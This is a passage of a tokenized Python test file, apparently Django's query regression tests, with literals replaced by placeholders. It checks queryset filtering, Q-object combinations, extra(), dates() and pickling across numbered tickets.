assertTrue ( repr ( qs [ <NUM_LIT:0> ] . note ) , '<STR_LIT>' ) <EOL> self . assertEqual ( repr ( qs [ <NUM_LIT:0> ] . creator . extra . note ) , '<STR_LIT>' ) <EOL> def test_ticket3037 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( Q ( creator__name = '<STR_LIT>' , name = '<STR_LIT>' ) | Q ( creator__name = '<STR_LIT>' , name = '<STR_LIT>' ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_tickets_5321_7070 ( self ) : <EOL> self . assertValueQuerysetEqual ( <EOL> Note . objects . values ( '<STR_LIT>' ) . distinct ( ) . order_by ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> [ { '<STR_LIT>' : u'<STR_LIT:foo>' } , { '<STR_LIT>' : u'<STR_LIT:bar>' } , { '<STR_LIT>' : u'<STR_LIT:foo>' } ] <EOL> ) <EOL> def test_ticket4358 ( self ) : <EOL> self . assertTrue ( '<STR_LIT>' in ExtraInfo . objects . values ( ) [ <NUM_LIT:0> ] ) <EOL> self . assertValueQuerysetEqual ( <EOL> ExtraInfo . objects . values ( '<STR_LIT>' ) , <EOL> [ { '<STR_LIT>' : <NUM_LIT:1> } , { '<STR_LIT>' : <NUM_LIT:2> } ] <EOL> ) <EOL> self . assertValueQuerysetEqual ( <EOL> ExtraInfo . objects . values ( '<STR_LIT>' ) , <EOL> [ { '<STR_LIT>' : <NUM_LIT:1> } , { '<STR_LIT>' : <NUM_LIT:2> } ] <EOL> ) <EOL> def test_ticket2902 ( self ) : <EOL> s = [ ( '<STR_LIT:a>' , '<STR_LIT:%s>' ) , ( '<STR_LIT:b>' , '<STR_LIT:%s>' ) ] <EOL> params = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> if { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } . keys ( ) == [ '<STR_LIT:a>' , '<STR_LIT:b>' ] : <EOL> s . reverse ( ) <EOL> params . reverse ( ) <EOL> d = Item . objects . extra ( select = SortedDict ( s ) , select_params = params ) . values ( '<STR_LIT:a>' , '<STR_LIT:b>' ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( d , { '<STR_LIT:a>' : u'<STR_LIT>' , '<STR_LIT:b>' : u'<STR_LIT>' } ) <EOL> l = Item . objects . extra ( select = { '<STR_LIT:count>' : '<STR_LIT>' } ) . order_by ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ o . 
count for o in l ] , [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> ] ) <EOL> def test_ticket6154 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( id = self . a1 . id ) . filter ( Q ( extra__note = self . n1 ) | Q ( item__note = self . n3 ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( Q ( extra__note = self . n1 ) | Q ( item__note = self . n3 ) ) . filter ( id = self . a1 . id ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket6981 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . select_related ( '<STR_LIT>' ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket9926 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . select_related ( "<STR_LIT>" , "<STR_LIT>" ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . select_related ( '<STR_LIT>' , "<STR_LIT>" ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_tickets_6180_6203 ( self ) : <EOL> self . assertEqual ( Item . objects . count ( ) , <NUM_LIT:4> ) <EOL> self . assertEqual ( Item . objects . dates ( '<STR_LIT>' , '<STR_LIT>' ) . count ( ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( Item . objects . dates ( '<STR_LIT>' , '<STR_LIT>' ) . count ( ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( Item . objects . dates ( '<STR_LIT>' , '<STR_LIT>' ) ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( Item . objects . dates ( '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] , datetime . datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> def test_tickets_7087_12242 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . 
dates ( '<STR_LIT>' , '<STR_LIT>' ) . extra ( select = { '<STR_LIT:a>' : <NUM_LIT:1> } ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . extra ( select = { '<STR_LIT:a>' : <NUM_LIT:1> } ) . dates ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> name = "<STR_LIT>" <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . dates ( '<STR_LIT>' , '<STR_LIT>' ) . extra ( where = [ '<STR_LIT>' ] , params = [ name ] ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . extra ( where = [ '<STR_LIT>' ] , params = [ name ] ) . dates ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket7155 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . dates ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket7098 ( self ) : <EOL> self . assertValueQuerysetEqual ( <EOL> Item . objects . values ( '<STR_LIT>' ) . order_by ( '<STR_LIT>' , '<STR_LIT:id>' ) , <EOL> [ { '<STR_LIT>' : u'<STR_LIT>' } , { '<STR_LIT>' : u'<STR_LIT>' } , { '<STR_LIT>' : u'<STR_LIT>' } , { '<STR_LIT>' : u'<STR_LIT>' } ] <EOL> ) <EOL> def test_ticket7096 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . filter ( parent = self . t1 , name = '<STR_LIT>' ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . exclude ( parent = self . t1 , name = '<STR_LIT>' ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . exclude ( tags__name = '<STR_LIT>' , name = '<STR_LIT>' ) . order_by ( '<STR_LIT:name>' ) . distinct ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( name__in = [ '<STR_LIT>' , '<STR_LIT>' ] ) . exclude ( tags__name = '<STR_LIT>' ) . 
order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . exclude ( ~ Q ( tags__name = '<STR_LIT>' , name = '<STR_LIT>' ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( ~ Q ( tags__name = '<STR_LIT>' , name = '<STR_LIT>' ) , name = '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . exclude ( ~ Q ( tags__name = '<STR_LIT>' , name = '<STR_LIT>' ) , name = '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_tickets_7204_7506 ( self ) : <EOL> pickle . dumps ( Item . objects . all ( ) ) <EOL> def test_ticket7813 ( self ) : <EOL> qs = Item . objects . select_related ( ) <EOL> query = qs . query . get_compiler ( qs . db ) . as_sql ( ) [ <NUM_LIT:0> ] <EOL> query2 = pickle . loads ( pickle . dumps ( qs . query ) ) <EOL> self . assertEqual ( <EOL> query2 . get_compiler ( qs . db ) . as_sql ( ) [ <NUM_LIT:0> ] , <EOL> query <EOL> ) <EOL> def test_deferred_load_qs_pickling ( self ) : <EOL> qs = Item . objects . defer ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> q2 = pickle . loads ( pickle . dumps ( qs ) ) <EOL> self . assertEqual ( list ( qs ) , list ( q2 ) ) <EOL> q3 = pickle . loads ( pickle . dumps ( qs , pickle . HIGHEST_PROTOCOL ) ) <EOL> self . assertEqual ( list ( qs ) , list ( q3 ) ) <EOL> def test_ticket7277 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> self . n1 . annotation_set . filter ( Q ( tag = self . t5 ) | Q ( tag__children = self . t5 ) | Q ( tag__children__children = self . t5 ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_tickets_7448_7707 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . filter ( created__in = [ self . time1 , self . time2 ] ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket7235 ( self ) : <EOL> q = EmptyQuerySet ( ) <EOL> self . assertQuerysetEqual ( q . 
all ( ) , [ ] ) <EOL> self . assertQuerysetEqual ( q . filter ( x = <NUM_LIT:10> ) , [ ] ) <EOL> self . assertQuerysetEqual ( q . exclude ( y = <NUM_LIT:3> ) , [ ] ) <EOL> self . assertQuerysetEqual ( q . complex_filter ( { '<STR_LIT>' : <NUM_LIT:1> } ) , [ ] ) <EOL> self . assertQuerysetEqual ( q . select_related ( '<STR_LIT>' , '<STR_LIT>' ) , [ ] ) <EOL> self . assertQuerysetEqual ( q . annotate ( Count ( '<STR_LIT>' ) ) , [ ] ) <EOL> self . assertQuerysetEqual ( q . order_by ( '<STR_LIT>' , '<STR_LIT>' ) , [ ] ) <EOL> self . assertQuerysetEqual ( q . distinct ( ) , [ ] ) <EOL> self . assertQuerysetEqual ( <EOL> q . extra ( select = { '<STR_LIT>' : "<STR_LIT>" } ) , <EOL> [ ] <EOL> ) <EOL> q . query . low_mark = <NUM_LIT:1> <EOL> self . assertRaisesMessage ( <EOL> AssertionError , <EOL> '<STR_LIT>' , <EOL> q . extra , select = { '<STR_LIT>' : "<STR_LIT>" } <EOL> ) <EOL> self . assertQuerysetEqual ( q . reverse ( ) , [ ] ) <EOL> self . assertQuerysetEqual ( q . defer ( '<STR_LIT>' , '<STR_LIT>' ) , [ ] ) <EOL> self . assertQuerysetEqual ( q . only ( '<STR_LIT>' , '<STR_LIT>' ) , [ ] ) <EOL> def test_ticket7791 ( self ) : <EOL> self . assertEqual ( <EOL> len ( Note . objects . order_by ( '<STR_LIT>' ) . distinct ( ) ) , <EOL> <NUM_LIT:3> <EOL> ) <EOL> qs = Item . objects . dates ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> _ = pickle . loads ( pickle . dumps ( qs ) ) <EOL> def test_ticket9997 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . filter ( name__in = Tag . objects . filter ( parent = self . t1 ) . values ( '<STR_LIT:name>' ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertRaisesMessage ( <EOL> TypeError , <EOL> '<STR_LIT>' , <EOL> lambda : Tag . objects . filter ( name__in = Tag . objects . filter ( parent = self . t1 ) . values ( '<STR_LIT:name>' , '<STR_LIT:id>' ) ) <EOL> ) <EOL> self . assertRaisesMessage ( <EOL> TypeError , <EOL> '<STR_LIT>' , <EOL> lambda : Tag . objects . filter ( name__in = Tag . objects . 
filter ( parent = self . t1 ) . values_list ( '<STR_LIT:name>' , '<STR_LIT:id>' ) ) <EOL> ) <EOL> def test_ticket9985 ( self ) : <EOL> self . assertValueQuerysetEqual ( <EOL> Note . objects . values_list ( "<STR_LIT>" , flat = True ) . values ( "<STR_LIT:id>" ) . order_by ( "<STR_LIT:id>" ) , <EOL> [ { '<STR_LIT:id>' : <NUM_LIT:1> } , { '<STR_LIT:id>' : <NUM_LIT:2> } , { '<STR_LIT:id>' : <NUM_LIT:3> } ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Annotation . objects . filter ( notes__in = Note . objects . filter ( note = "<STR_LIT>" ) . values_list ( '<STR_LIT>' ) . values ( '<STR_LIT:id>' ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket10205 ( self ) : <EOL> self . assertEqual ( Tag . objects . filter ( name__in = ( ) ) . update ( name = "<STR_LIT:foo>" ) , <NUM_LIT:0> ) <EOL> def test_ticket10432 ( self ) : <EOL> def f ( ) : <EOL> return iter ( [ ] ) <EOL> n_obj = Note . objects . all ( ) [ <NUM_LIT:0> ] <EOL> def g ( ) : <EOL> for i in [ n_obj . pk ] : <EOL> yield i <EOL> self . assertQuerysetEqual ( Note . objects . filter ( pk__in = f ( ) ) , [ ] ) <EOL> self . assertEqual ( list ( Note . objects . filter ( pk__in = g ( ) ) ) , [ n_obj ] ) <EOL> def test_ticket10742 ( self ) : <EOL> subq = Author . objects . filter ( num__lt = <NUM_LIT> ) <EOL> qs = Author . objects . filter ( pk__in = subq ) <EOL> self . assertQuerysetEqual ( qs , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertTrue ( subq . _result_cache is None ) <EOL> subq = Author . objects . filter ( num__lt = <NUM_LIT> ) <EOL> qs = Author . objects . exclude ( pk__in = subq ) <EOL> self . assertQuerysetEqual ( qs , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertTrue ( subq . _result_cache is None ) <EOL> subq = Author . objects . filter ( num__lt = <NUM_LIT> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( Q ( pk__in = subq ) & Q ( name = '<STR_LIT>' ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertTrue ( subq . 
_result_cache is None ) <EOL> def test_ticket7076 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Item . objects . exclude ( modified = self . time1 ) . order_by ( '<STR_LIT:name>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . exclude ( parent__name = self . t1 . name ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket7181 ( self ) : <EOL> self . assertEqual ( len ( Tag . objects . order_by ( '<STR_LIT>' ) ) , <NUM_LIT:5> ) <EOL> self . assertQuerysetEqual ( <EOL> Note . objects . none ( ) | Note . objects . all ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Note . objects . all ( ) | Note . objects . none ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( Note . objects . none ( ) & Note . objects . all ( ) , [ ] ) <EOL> self . assertQuerysetEqual ( Note . objects . all ( ) & Note . objects . none ( ) , [ ] ) <EOL> def test_ticket9411 ( self ) : <EOL> qs = Tag . objects . values_list ( '<STR_LIT:id>' , flat = True ) . order_by ( '<STR_LIT:id>' ) <EOL> qs . query . bump_prefix ( ) <EOL> first = qs [ <NUM_LIT:0> ] <EOL> self . assertEqual ( list ( qs ) , range ( first , first + <NUM_LIT:5> ) ) <EOL> def test_ticket8439 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( Q ( item__note__extrainfo = self . e2 ) | Q ( report = self . r1 , name = '<STR_LIT>' ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( Q ( report = self . r1 , name = '<STR_LIT>' ) | Q ( item__note__extrainfo = self . e2 ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Annotation . objects . filter ( Q ( tag__parent = self . t1 ) | Q ( notes__note = '<STR_LIT>' , name = '<STR_LIT>' ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> xx = ExtraInfo . objects . 
create ( info = '<STR_LIT>' , note = self . n3 ) <EOL> self . assertQuerysetEqual ( <EOL> Note . objects . filter ( Q ( extrainfo__author = self . a1 ) | Q ( extrainfo = xx ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> xx . delete ( ) <EOL> q = Note . objects . filter ( Q ( extrainfo__author = self . a1 ) | Q ( extrainfo = xx ) ) . query <EOL> self . assertEqual ( <EOL> len ( [ x [ <NUM_LIT:2> ] for x in q . alias_map . values ( ) if x [ <NUM_LIT:2> ] == q . LOUTER and q . alias_refcount [ x [ <NUM_LIT:1> ] ] ] ) , <EOL> <NUM_LIT:1> <EOL> ) <EOL> class Queries2Tests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> Number . objects . create ( num = <NUM_LIT:4> ) <EOL> Number . objects . create ( num = <NUM_LIT:8> ) <EOL> Number . objects . create ( num = <NUM_LIT:12> ) <EOL> def test_ticket4289 ( self ) : <EOL> self . assertQuerysetEqual ( Number . objects . filter ( num__lt = <NUM_LIT:4> ) , [ ] ) <EOL> self . assertQuerysetEqual ( Number . objects . filter ( num__gt = <NUM_LIT:8> , num__lt = <NUM_LIT:12> ) , [ ] ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__gt = <NUM_LIT:8> , num__lt = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( Q ( num__lt = <NUM_LIT:4> ) | Q ( num__gt = <NUM_LIT:8> , num__lt = <NUM_LIT:12> ) ) , <EOL> [ ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( Q ( num__gt = <NUM_LIT:8> , num__lt = <NUM_LIT:12> ) | Q ( num__lt = <NUM_LIT:4> ) ) , <EOL> [ ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( Q ( num__gt = <NUM_LIT:8> ) & Q ( num__lt = <NUM_LIT:12> ) | Q ( num__lt = <NUM_LIT:4> ) ) , <EOL> [ ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( Q ( num__gt = <NUM_LIT:7> ) & Q ( num__lt = <NUM_LIT:12> ) | Q ( num__lt = <NUM_LIT:4> ) ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket12239 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Number . 
objects . filter ( num__gt = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( Number . objects . filter ( num__gt = <NUM_LIT:12> ) , [ ] ) <EOL> self . assertQuerysetEqual ( Number . objects . filter ( num__gt = <NUM_LIT> ) , [ ] ) <EOL> self . assertQuerysetEqual ( Number . objects . filter ( num__gt = <NUM_LIT> ) , [ ] ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__lt = <NUM_LIT:12> ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__lt = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__lt = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__gte = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__gte = <NUM_LIT:12> ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__gte = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( Number . objects . filter ( num__gte = <NUM_LIT> ) , [ ] ) <EOL> self . assertQuerysetEqual ( Number . objects . filter ( num__gte = <NUM_LIT> ) , [ ] ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__lte = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__lte = <NUM_LIT:12> ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__lte = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . objects . filter ( num__lte = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Number . 
objects . filter ( num__lte = <NUM_LIT> ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_ticket7411 ( self ) : <EOL> for num in range ( <NUM_LIT:2> * ITER_CHUNK_SIZE + <NUM_LIT:1> ) : <EOL> _ = Number . objects . create ( num = num ) <EOL> for i , obj in enumerate ( Number . objects . all ( ) ) : <EOL> obj . save ( ) <EOL> if i > <NUM_LIT:10> : break <EOL> def test_ticket7759 ( self ) : <EOL> count = Number . objects . count ( ) <EOL> qs = Number . objects . all ( ) <EOL> def run ( ) : <EOL> for obj in qs : <EOL> return qs . count ( ) == count <EOL> self . assertTrue ( run ( ) ) <EOL> class Queries3Tests ( BaseQuerysetTest ) : <EOL> def test_ticket7107 ( self ) : <EOL> self . assertQuerysetEqual ( Valid . objects . all ( ) , [ ] ) <EOL> def test_ticket8683 ( self ) : <EOL> self . assertRaisesMessage ( <EOL> AssertionError , <EOL> "<STR_LIT>" , <EOL> Item . objects . dates , '<STR_LIT:name>' , '<STR_LIT>' <EOL> ) <EOL> class Queries4Tests ( BaseQuerysetTest ) : <EOL> def setUp ( self ) : <EOL> generic = NamedCategory . objects . create ( name = "<STR_LIT>" ) <EOL> self . t1 = Tag . objects . create ( name = '<STR_LIT>' , category = generic ) <EOL> n1 = Note . objects . create ( note = '<STR_LIT>' , misc = '<STR_LIT:foo>' , id = <NUM_LIT:1> ) <EOL> n2 = Note . objects . create ( note = '<STR_LIT>' , misc = '<STR_LIT:bar>' , id = <NUM_LIT:2> ) <EOL> e1 = ExtraInfo . objects . create ( info = '<STR_LIT>' , note = n1 ) <EOL> e2 = ExtraInfo . objects . create ( info = '<STR_LIT>' , note = n2 ) <EOL> a1 = Author . objects . create ( name = '<STR_LIT>' , num = <NUM_LIT> , extra = e1 ) <EOL> a3 = Author . objects . create ( name = '<STR_LIT>' , num = <NUM_LIT> , extra = e2 ) <EOL> Report . objects . create ( name = '<STR_LIT>' , creator = a1 ) <EOL> Report . objects . create ( name = '<STR_LIT>' , creator = a3 ) <EOL> Report . objects . create ( name = '<STR_LIT>' ) <EOL> def test_ticket7095 ( self ) : <EOL> ManagedModel . objects . 
create ( data = '<STR_LIT>' , tag = self . t1 , public = True ) <EOL> self . assertEqual ( ManagedModel . objects . update ( data = '<STR_LIT>' ) , <NUM_LIT:1> ) <EOL> if connection . features . interprets_empty_strings_as_nulls : <EOL> expected_null_charfield_repr = u'<STR_LIT>' <EOL> else : <EOL> expected_null_charfield_repr = None <EOL> self . assertValueQuerysetEqual ( <EOL> Report . objects . values_list ( "<STR_LIT>" , flat = True ) . order_by ( "<STR_LIT:name>" ) , <EOL> [ u'<STR_LIT>' , u'<STR_LIT>' , expected_null_charfield_repr ] , <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Report . objects . select_related ( "<STR_LIT>" , "<STR_LIT>" ) . order_by ( "<STR_LIT:name>" ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> d1 = Detail . objects . create ( data = "<STR_LIT>" ) <EOL> d2 = Detail . objects . create ( data = "<STR_LIT>" ) <EOL> m1 = Member . objects . create ( name = "<STR_LIT>" , details = d1 ) <EOL> m2 = Member . objects . create ( name = "<STR_LIT>" , details = d2 ) <EOL> Child . objects . create ( person = m2 , parent = m1 ) <EOL> obj = m1 . children . select_related ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( obj . person . details . data , u'<STR_LIT>' ) <EOL> def test_order_by_resetting ( self ) : <EOL> qs = Author . objects . order_by ( ) . order_by ( '<STR_LIT:name>' ) <EOL> self . assertTrue ( '<STR_LIT>' in qs . query . get_compiler ( qs . db ) . as_sql ( ) [ <NUM_LIT:0> ] ) <EOL> def test_ticket10181 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Tag . objects . filter ( id__in = Tag . objects . filter ( id__in = [ ] ) ) , <EOL> [ ] <EOL> ) <EOL> class Queries5Tests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> n1 = Note . objects . create ( note = '<STR_LIT>' , misc = '<STR_LIT:foo>' , id = <NUM_LIT:1> ) <EOL> n2 = Note . objects . create ( note = '<STR_LIT>' , misc = '<STR_LIT:bar>' , id = <NUM_LIT:2> ) <EOL> e1 = ExtraInfo . objects . 
create ( info = '<STR_LIT>' , note = n1 ) <EOL> e2 = ExtraInfo . objects . create ( info = '<STR_LIT>' , note = n2 ) <EOL> a1 = Author . objects . create ( name = '<STR_LIT>' , num = <NUM_LIT> , extra = e1 ) <EOL> a2 = Author . objects . create ( name = '<STR_LIT>' , num = <NUM_LIT> , extra = e1 ) <EOL> a3 = Author . objects . create ( name = '<STR_LIT>' , num = <NUM_LIT> , extra = e2 ) <EOL> self . rank1 = Ranking . objects . create ( rank = <NUM_LIT:2> , author = a2 ) <EOL> Ranking . objects . create ( rank = <NUM_LIT:1> , author = a3 ) <EOL> Ranking . objects . create ( rank = <NUM_LIT:3> , author = a1 ) <EOL> def test_ordering ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Ranking . objects . all ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Ranking . objects . all ( ) . order_by ( '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Ranking . objects . extra ( tables = [ '<STR_LIT>' ] , order_by = [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> qs = Ranking . objects . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( <EOL> [ o . good for o in qs . extra ( order_by = ( '<STR_LIT>' , ) ) ] , <EOL> [ True , False , False ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> qs . extra ( order_by = ( '<STR_LIT>' , '<STR_LIT:id>' ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> dicts = qs . values ( '<STR_LIT:id>' , '<STR_LIT>' ) . order_by ( '<STR_LIT:id>' ) <EOL> self . assertEqual ( <EOL> [ d . items ( ) [ <NUM_LIT:1> ] for d in dicts ] , <EOL> [ ( '<STR_LIT>' , <NUM_LIT:2> ) , ( '<STR_LIT>' , <NUM_LIT:1> ) , ( '<STR_LIT>' , <NUM_LIT:3> ) ] <EOL> ) <EOL> def test_ticket7256 ( self ) : <EOL> qs = Ranking . objects . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> dicts = qs . values ( ) . 
order_by ( '<STR_LIT:id>' ) <EOL> for d in dicts : del d [ '<STR_LIT:id>' ] ; del d [ '<STR_LIT>' ] <EOL> self . assertEqual ( <EOL> [ sorted ( d . items ( ) ) for d in dicts ] , <EOL> [ [ ( '<STR_LIT>' , <NUM_LIT:0> ) , ( '<STR_LIT>' , <NUM_LIT:2> ) ] , [ ( '<STR_LIT>' , <NUM_LIT:0> ) , ( '<STR_LIT>' , <NUM_LIT:1> ) ] , [ ( '<STR_LIT>' , <NUM_LIT:1> ) , ( '<STR_LIT>' , <NUM_LIT:3> ) ] ] <EOL> ) <EOL> def test_ticket7045 ( self ) : <EOL> qs = Ranking . objects . extra ( tables = [ '<STR_LIT>' ] ) <EOL> qs . query . get_compiler ( qs . db ) . as_sql ( ) <EOL> qs . query . get_compiler ( qs . db ) . as_sql ( ) <EOL> def test_ticket9848 ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Ranking . objects . filter ( author__name = '<STR_LIT>' ) , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertEqual ( <EOL> Ranking . objects . filter ( author__name = '<STR_LIT>' ) . update ( rank = '<STR_LIT:4>' ) , <EOL> <NUM_LIT:1> <EOL> ) <EOL> r = 